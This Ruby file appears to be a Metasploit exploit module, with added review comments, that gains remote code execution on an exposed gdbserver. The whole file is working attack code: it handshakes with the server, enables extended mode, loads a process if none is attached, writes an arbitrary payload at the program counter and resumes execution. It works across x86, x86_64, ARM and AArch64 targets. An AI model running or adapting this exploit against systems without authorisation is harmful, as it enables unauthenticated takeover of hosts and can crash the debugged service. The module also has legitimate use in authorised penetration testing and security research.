##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for a network-reachable gdbserver.
#
# All wire-protocol work (connect, handshake, enable_extended_mode,
# process_info, run_file, write, continue, disconnect) comes from the
# Msf::Exploit::Remote::Gdb mixin; this class only sequences those calls.
# No credential option is registered here, so reachability of the gdbserver
# port appears to be the only prerequisite (the mixin may add its own
# options — confirm there). The Notes metadata below records the defender-
# relevant footprint: the session is visible in logs (IOC_IN_LOGS) and the
# debugged service may crash or lose resources.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Gdb

  # Registers module metadata and the EXE_FILE option.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GDB Server Remote Payload Execution',
        'Description' => %q{
          This module attempts to execute an arbitrary payload on a loose gdbserver service.
        },
        'Author' => [ 'joev' ],
        # One target per architecture the module can detect from gdb; the
        # architecture check in #exploit compares against these.
        'Targets' => [
          [ 'x86', { 'Arch' => ARCH_X86 } ],
          [ 'x86_64', { 'Arch' => ARCH_X64 } ],
          [ 'ARMLE', { 'Arch' => ARCH_ARMLE } ],
          [ 'AARCH64', { 'Arch' => ARCH_AARCH64 } ],
        ],
        'References' => [
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3691']
        ],
        'DisclosureDate' => '2014-08-24',
        'Platform' => %w[linux unix osx],
        'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
        # Operational side effects: traffic lands in logs, and the debugged
        # process/service may be taken down or lose resources.
        'Notes' => {
          'SideEffects' => [IOC_IN_LOGS],
          'Stability' => [CRASH_SERVICE_DOWN, SERVICE_RESOURCE_LOSS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          # NOTE(review): presumably forks so the payload runs in a child
          # rather than in the debugged program itself — confirm against the
          # payload prepend handling.
          'PrependFork' => true
        }
      )
    )

    register_options([
      # Only consulted on the rescue path in #exploit, i.e. when gdbserver is
      # not attached to any process; the default is a no-op binary.
      OptString.new('EXE_FILE', [
        false,
        'The exe to spawn when gdbserver is not attached to a process.',
        '/bin/true'
      ])
    ])
  end

  # Drives one gdbserver session: handshake, switch to extended mode, find
  # the program counter and architecture of the debugged process, write the
  # encoded payload at the PC and resume execution.
  #
  # The calls follow the order the remote protocol expects; do not reorder
  # them. Every failure path goes through fail_with, and the ensure clause
  # closes the socket whenever one was opened.
  #
  # @raise via fail_with with Failure::UnexpectedReply when extended mode or
  #   the program load is not acknowledged with OK, and Failure::BadConfig when
  #   the payload architecture does not match the one reported by gdb
  def exploit
    connect

    print_status('Performing handshake with gdbserver...')
    handshake

    # NOTE(review): extended mode is presumably required for run_file below
    # to work — confirm in the Gdb mixin. Any reply without OK aborts.
    res = enable_extended_mode
    if res !~ /OK/
      fail_with(Failure::UnexpectedReply, 'Could not enable extended mode.')
    end

    begin
      print_status('Stepping program to find PC...')
      gdb_data = process_info
    rescue BadAckError, BadResponseError
      # gdbserver is running with the --multi flag and is not currently
      # attached to any process. let's attach to /bin/true or something.
      print_status("No process loaded, attempting to load #{datastore['EXE_FILE']}...")
      res = run_file(datastore['EXE_FILE'])
      if res !~ /OK/
        fail_with(Failure::UnexpectedReply, 'Could not load new program.')
      end
      # Second attempt now that a process is attached; a further error here
      # propagates out of the method.
      gdb_data = process_info
    end

    # process_info is expected to return a Hash with :pc and :arch keys.
    gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)

    # payload.arch is a collection; the message reports its first entry.
    unless payload.arch.include?(gdb_arch)
      fail_with(Failure::BadConfig, "The payload architecture is incorrect: the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb.")
    end

    print_status("Writing payload at #{gdb_pc}...")
    write(payload.encoded, gdb_pc)

    print_status('Executing the payload...')
    # NOTE(review): read: false presumably skips waiting for a stop reply
    # after resuming — confirm against the mixin's continue implementation.
    continue({read: false})
  ensure
    # Runs on both success and fail_with; only tear down an open socket.
    disconnect if sock
  end
end